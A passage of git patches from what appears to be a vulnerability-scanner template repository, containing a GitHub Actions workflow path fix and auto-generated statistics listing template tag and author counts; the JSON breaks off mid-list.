+| phpinfo | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | From ebec359bfcee304a9c13cde32ad6554ada7fe098 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 20:01:24 +0530 Subject: [PATCH 0902/4083] path update --- .github/workflows/templates-stats.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 214cf997e7..9457a24b98 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,4 +1,4 @@ -name: Templates Stats +name: 🗒 Templates Stats on: create: @@ -34,12 +34,12 @@ jobs: - name: Markdown Stats run: | - templates-stats -output TEMPLATES-STATS.md -path . + templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/ shell: bash - name: JSON Stats run: | - templates-stats -output TEMPLATES-STATS.json -json -path . + templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/ shell: bash - name: Commit files @@ -54,4 +54,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} + branch: ${{ github.ref }} \ No newline at end of file From 4485a4db26670916446e9a634ddd804703e1ad01 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 14:32:17 +0000 Subject: [PATCH 0903/4083] Auto Generated Templates Stats [Mon Jul 19 14:32:17 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1204 +++++++++++++++++++++--------------------- 2 files changed, 603 insertions(+), 603 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 5f49fff958..ad6fd08d99 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"logs","count":24},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"springboot","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"cve2011","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"cve2013","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"aws","count":8},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"php","count":8},{"name":"adobe","count":8},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"scada","count":7},{"name":"joomla","count":7},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"xxe","count":6},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"solr","count":5},{"name":"ruijie","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"ssti","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"phpmyadmin","count":5},{"name":"jetty","count":5},{"name":"drupal","count":5},{"name":"ibm","count":4},{"name":"solarwinds","count":4},{"name":"django","count":4},{"name":"moodle","count":4},{"name":"thinkcmf","count":4},{"name":"cve2009","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"docker","count":4},{"name":"vpn","count":4},{"name":"elastic","count":4},{"name":"router","count":4},{"name":"hongdian","count":4},{"name":"netgear","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"tomcat","count":4},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"fileupload","count":4},{"name":"webserver","count":4},{"name":"kafka","count":3},{"name":"crlf","count":3},{"name":"grafana","count":3},{"name":"fpd","count":3},{"name":"oa","count":3},{"name":"ofbiz","count":3},{"name":"r-seenet","count":3},{"name":"springcloud","count":3},{"name":"log","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"deserialization","count":3},{"name":"microstrategy","count":3},{"name":"git","count":3},{"name":"backups","count":3},{"name":"bypass","count":3},{"name":"kubernetes","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"resin","count":3},{"name":"lfr","count":3},{"name":"windows","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"nacos","count":3},{"name":"fanruan","count":3},{"name":"dedecms","count":3},{"name":"openssh","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"odoo","count":2},{"name":"hpe","count":2},{"name":"prometheus","count":2},{"name":"glassfish","count":2},{"name":"jellyfin","count":2},{"name":"smtp","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"service","count":2},{"name":"kibana","count":2},{"name":"ecology","count":2},{"name":"cve2008","count":2},{"name":"sonicwall","count":2},{"name":"vrealize","count":2},{"name":"couchdb","count":2},{"name":"injection","count":2},{"name":"smb","count":2},{"name":"exposures","count":2},{"name":"plesk","count":2},{"name":"jboss","count":2},{"name":"strapi","count":2},{"name":"mail","count":2},{"name":"trixbox","count":2},{"name":"mida","count":2},{"name":"zabbix","count":2},{"name":"xxljob","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"sonarqube","count":2},{"name":"bitrix","count":2},{"name":"nextjs","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"rockethchat","count":2},{"name":"shellshock","count":2},{"name":"frp","count":2},{"name":"chamilo","count":2},{"name":"nexus","count":2},{"name":"voipmonitor","count":2},{"name":"httpd","count":2},{"name":"flir","count":2},{"name":"rstudio","count":2},{"name":"activemq","count":2},{"name":"sharepoint","count":2},{"name":"ucmdb","count":2},{"name":"coldfusion","count":2},{"name":"huawei","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"rockmongo","count":2},{"name":"splunk","count":2},{"name":"microsoft","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"kentico","count":2},{"name":"zhiyuan","count":2},{"name":"globalprotect","count":2},{"name":"leak","count":2},{"name":"hjtcloud","count":2},{"name":"openfire","count":2},{"name":"saltstack","count":2},{"name":"seeyon","count":2},{"name":"hp","count":2},{"name":"proxy","count":2},{"name":"fortios","count":2},{"name":"paloalto","count":2},{"name":"showdoc","count":2},{"name":"intrusive","count":2},{"name":"telerik","count":2},{"name":"webcam","count":2},{"name":"icewarp","count":2},{"name":"bash","count":1},{"name":"hadoop","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"mongo","count":1},{"name":"landrayoa","count":1},{"name":"monitorix","count":1},{"name":"webui","count":1},{"name":"darkstat","count":1},{"name":"rdp","count":1},{"name":"wildfly","count":1},{"name":"zenario","count":1},{"name":"triconsole","count":1},{"name":"jmx","count":1},{"name":"wso2","count":1},{"name":"lotuscms","count":1},{"name":"klog","count":1},{"name":"embedthis","count":1},{"name":"linkedin","count":1},{"name":"faraday","count":1},{"name":"dvwa","count":1},{"name":"mcafee","count":1},{"name":"druid","count":1},{"name":"smartsense","count":1},{"name":"zeroshell","count":1},{"name":"openrestry","count":1},{"name":"rsyncd","count":1},{"name":"alibaba","count":1},{"name":"fastcgi","count":1},{"name":"zookeeper","count":1},{"name":"optiLink","count":1},{"name":"calendarix","count":1},{"name":"netis","count":1},{"name":"rhymix","count":1},{"name":"panabit","count":1},{"name":"livezilla","count":1},{"name":"nuxeo","count":1},{"name":"targa","count":1},{"name":"ems","count":1},{"name":"bullwark","count":1},{"name":"mediumish","count":1},{"name":"firebase","count":1},{"name":"mantisbt","count":1},{"name":"opensns","count":1},{"name":"netdata","count":1},{"name":"kubeflow","count":1},{"name":"nedi","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"aura","count":1},{"name":"svnserve","count":1},{"name":"crm","count":1},{"name":"primetek","count":1},{"name":"lanproxy","count":1},{"name":"svn","count":1},{"name":"ioncube","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"sitecore","count":1},{"name":"sqlite","count":1},{"name":"vscode","count":1},{"name":"cocoon","count":1},{"name":"rubedo","count":1},{"name":"htmli","count":1},{"name":"jnoj","count":1},{"name":"phpunit","count":1},{"name":"rmc","count":1},{"name":"etouch","count":1},{"name":"nexusdb","count":1},{"name":"totaljs","count":1},{"name":"gitlist","count":1},{"name":"wamp","count":1},{"name":"jquery","count":1},{"name":"mailchimp","count":1},{"name":"phpinfo","count":1},{"name":"wp-theme","count":1},{"name":"fedora","count":1},{"name":"grav","count":1},{"name":"krweb","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"varnish","count":1},{"name":"harbor","count":1},{"name":"turbocrm","count":1},{"name":"bolt","count":1},{"name":"discord","count":1},{"name":"geddy","count":1},{"name":"memcached","count":1},{"name":"hasura","count":1},{"name":"eyou","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"fortiweb","count":1},{"name":"uwsgi","count":1},{"name":"interlib","count":1},{"name":"openstack","count":1},{"name":"sprintful","count":1},{"name":"jsf","count":1},{"name":"szhe","count":1},{"name":"bookstack","count":1},{"name":"goahead","count":1},{"name":"geutebruck","count":1},{"name":"episerver","count":1},{"name":"ntopng","count":1},{"name":"stem","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"synnefo","count":1},{"name":"hortonworks","count":1},{"name":"jfrog","count":1},{"name":"ilo4","count":1},{"name":"ecom","count":1},{"name":"ec2","count":1},{"name":"huijietong","count":1},{"name":"yachtcontrol","count":1},{"name":"traefik","count":1},{"name":"tika","count":1},{"name":"zarafa","count":1},{"name":"email","count":1},{"name":"maccmsv10","count":1},{"name":"enum","count":1},{"name":"tapestry","count":1},{"name":"opencast","count":1},{"name":"trilithic","count":1},{"name":"idemia","count":1},{"name":"kerbynet","count":1},{"name":"alertmanager","count":1},{"name":"node-red-dashboard","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"sidekiq","count":1},{"name":"xdcms","count":1},{"name":"favicon","count":1},{"name":"ueditor","count":1},{"name":"spf","count":1},{"name":"shopware","count":1},{"name":"cgi","count":1},{"name":"comodo","count":1},{"name":"checkpoint","count":1},{"name":"nordex","count":1},{"name":"powercreator","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"flash","count":1},{"name":"zm","count":1},{"name":"acme","count":1},{"name":"grails","count":1},{"name":"beanshell","count":1},{"name":"clave","count":1},{"name":"plone","count":1},{"name":"clusterengine","count":1},{"name":"blue-ocean","count":1},{"name":"haproxy","count":1},{"name":"keenetic","count":1},{"name":"cors","count":1},{"name":"wooyun","count":1},{"name":"servicedesk","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"finereport","count":1},{"name":"sentry","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"gridx","count":1},{"name":"cve2005","count":1},{"name":"circontrorl","count":1},{"name":"viewlinc","count":1},{"name":"javascript","count":1},{"name":"codeigniter","count":1},{"name":"wuzhicms","count":1},{"name":"drone","count":1},{"name":"subrion","count":1},{"name":"oscommerce","count":1},{"name":"scs","count":1},{"name":"adminer","count":1},{"name":"enumeration","count":1},{"name":"xiuno","count":1},{"name":"st","count":1},{"name":"sco","count":1},{"name":"mobileiron","count":1},{"name":"csod","count":1},{"name":"socomec","count":1},{"name":"itop","count":1},{"name":"phalcon","count":1},{"name":"dlogin","count":1},{"name":"liferay","count":1},{"name":"rmi","count":1},{"name":"parentlink","count":1},{"name":"linksys","count":1},{"name":"horde","count":1},{"name":"gogs","count":1},{"name":"mautic","count":1},{"name":"ssltls","count":1},{"name":"flink","count":1},{"name":"starttls","count":1},{"name":"javamelody","count":1},{"name":"seacms","count":1},{"name":"salesforce","count":1},{"name":"dompdf","count":1},{"name":"clockwatch","count":1},{"name":"mirai","count":1},{"name":"zend","count":1},{"name":"zmanda","count":1},{"name":"wavemaker","count":1},{"name":"pulsesecure","count":1},{"name":"fastapi","count":1},{"name":"floc","count":1},{"name":"ambari","count":1},{"name":"dotnetnuke","count":1},{"name":"circontrol","count":1},{"name":"fortigate","count":1},{"name":"openerp","count":1},{"name":"fortinet","count":1},{"name":"k8","count":1},{"name":"azure","count":1},{"name":"opm","count":1},{"name":"fortigates","count":1},{"name":"discourse","count":1},{"name":"mara","count":1},{"name":"payara","count":1},{"name":"tenda","count":1},{"name":"symfony","count":1},{"name":"linkerd","count":1},{"name":"biometrics","count":1},{"name":"acexy","count":1},{"name":"exchange","count":1},{"name":"alerta","count":1},{"name":"postgres","count":1},{"name":"diris","count":1},{"name":"rfi","count":1},{"name":"octoprint","count":1},{"name":"gloo","count":1},{"name":"74cms","count":1},{"name":"tamronos","count":1},{"name":"2014","count":1},{"name":"dvr","count":1},{"name":"bruteforce","count":1},{"name":"akamai","count":1},{"name":"zcms","count":1},{"name":"jsp","count":1},{"name":"zte","count":1},{"name":"swagger","count":1},{"name":"xml","count":1},{"name":"pacsone","count":1},{"name":"shopxo","count":1},{"name":"xff","count":1},{"name":"springframework","count":1},{"name":"pippoint","count":1},{"name":"postmessage","count":1},{"name":"webadmin","count":1},{"name":"webmodule-ee","count":1},{"name":"nc2","count":1},{"name":"realteo","count":1},{"name":"kyan","count":1},{"name":"upnp","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"nuuo","count":1},{"name":"k8s","count":1},{"name":"plugin","count":1},{"name":"rabbitmq","count":1},{"name":"redis","count":1},{"name":"appweb","count":1},{"name":"tensorboard","count":1},{"name":"centos","count":1},{"name":"heroku","count":1},{"name":"thinkadmin","count":1},{"name":"majordomo2","count":1},{"name":"concrete","count":1},{"name":"cve2007","count":1},{"name":"db","count":1},{"name":"myucms","count":1},{"name":"mdb","count":1},{"name":"dotnet","count":1},{"name":"redwood","count":1},{"name":"zimbra","count":1},{"name":"csrf","count":1},{"name":"backdoor","count":1},{"name":"extractor","count":1},{"name":"glances","count":1},{"name":"landray","count":1},{"name":"portainer","count":1},{"name":"duomicms","count":1},{"name":"empirecms","count":1},{"name":"nette","count":1},{"name":"anchorcms","count":1},{"name":"mpsec","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"feifeicms","count":1},{"name":"cloudinary","count":1},{"name":"panos","count":1},{"name":"expn","count":1},{"name":"nsasg","count":1},{"name":"tpshop","count":1},{"name":"selea","count":1},{"name":"jenkin","count":1},{"name":"servicenow","count":1},{"name":"razor","count":1},{"name":"erp-nc","count":1},{"name":"rujjie","count":1},{"name":"mongoshake","count":1},{"name":"sarg","count":1},{"name":"bitly","count":1},{"name":"setup","count":1},{"name":"soar","count":1},{"name":"plastic","count":1},{"name":"revision","count":1},{"name":"kafdrop","count":1},{"name":"netrc","count":1},{"name":"jenzabar","count":1},{"name":"spring","count":1},{"name":"tongda","count":1},{"name":"vsftpd","count":1},{"name":"b2evolution","count":1},{"name":"tensorflow","count":1},{"name":"weiphp","count":1},{"name":"javafaces","count":1},{"name":"nomad","count":1},{"name":"webmin","count":1},{"name":"status","count":1},{"name":"wiki","count":1},{"name":"codemeter","count":1},{"name":"skywalking","count":1},{"name":"emby","count":1},{"name":"cobub","count":1},{"name":"ganglia","count":1},{"name":"cve2010","count":1},{"name":"apiman","count":1},{"name":"visionhub","count":1},{"name":"robomongo","count":1},{"name":"xunchi","count":1},{"name":"redhat","count":1},{"name":"fuelcms","count":1},{"name":"mysql","count":1},{"name":"proftpd","count":1},{"name":"ulterius","count":1},{"name":"lansweeper","count":1},{"name":"fortilogger","count":1},{"name":"labtech","count":1},{"name":"netsweeper","count":1},{"name":"pgadmin","count":1},{"name":"ns","count":1},{"name":"arl","count":1},{"name":"moinmoin","count":1},{"name":"kong","count":1},{"name":"opensmtpd","count":1},{"name":"zzzcms","count":1},{"name":"octobercms","count":1},{"name":"upload","count":1},{"name":"pyramid","count":1},{"name":"moin","count":1},{"name":"vsphere","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"blackboard","count":1},{"name":"jitsi","count":1},{"name":"avtech","count":1},{"name":"opentsdb","count":1},{"name":"chinaunicom","count":1},{"name":"jeewms","count":1},{"name":"aspnuke","count":1},{"name":"doh","count":1},{"name":"metinfo","count":1},{"name":"igs","count":1},{"name":"viewpoint","count":1},{"name":"ssl","count":1},{"name":"tileserver","count":1},{"name":"saltapi","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"randomstr1ng","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"melbadry9","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"philippedelteil","count":6},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"ganofins","count":5},{"name":"puzzlepeaches","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"nodauf","count":4},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"kophjager007","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fyoorer","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"foulenzer","count":2},{"name":"lu4nx","count":2},{"name":"incogbyte","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"randomrobbie","count":2},{"name":"swissky","count":2},{"name":"manas_harsh","count":2},{"name":"jarijaas","count":2},{"name":"elsfa7110","count":2},{"name":"bp0lr","count":2},{"name":"0xsapra","count":2},{"name":"lotusdll","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"davidmckennirey","count":2},{"name":"hetroublemakr","count":2},{"name":"random-robbie","count":2},{"name":"joeldeleep","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xelkomy","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"mavericknerd","count":2},{"name":"shifacyclewala","count":2},{"name":"moritz nentwig","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"ehsahil","count":2},{"name":"toufik airane","count":1},{"name":"kurohost","count":1},{"name":"soyelmago","count":1},{"name":"b4uh0lz","count":1},{"name":"streetofhackerr007","count":1},{"name":"nkxxkn","count":1},{"name":"_darrenmartyn","count":1},{"name":"fabaff","count":1},{"name":"rtcms","count":1},{"name":"mubassirpatel","count":1},{"name":"regala_","count":1},{"name":"ahmed sherif","count":1},{"name":"vzamanillo","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"furkansenan","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"jeya seelan","count":1},{"name":"divya_mudgal","count":1},{"name":"daviey","count":1},{"name":"_c0wb0y_","count":1},{"name":"rodnt","count":1},{"name":"patralos","count":1},{"name":"s1r1u5_","count":1},{"name":"notsoevilweasel","count":1},{"name":"bjhulst","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"geraldino2","count":1},{"name":"koti2","count":1},{"name":"nytr0gen","count":1},{"name":"apt-mirror","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"gal nagli","count":1},{"name":"0ut0fb4nd","count":1},{"name":"exploitation","count":1},{"name":"wabafet","count":1},{"name":"berkdusunur","count":1},{"name":"manikanta a.k.a 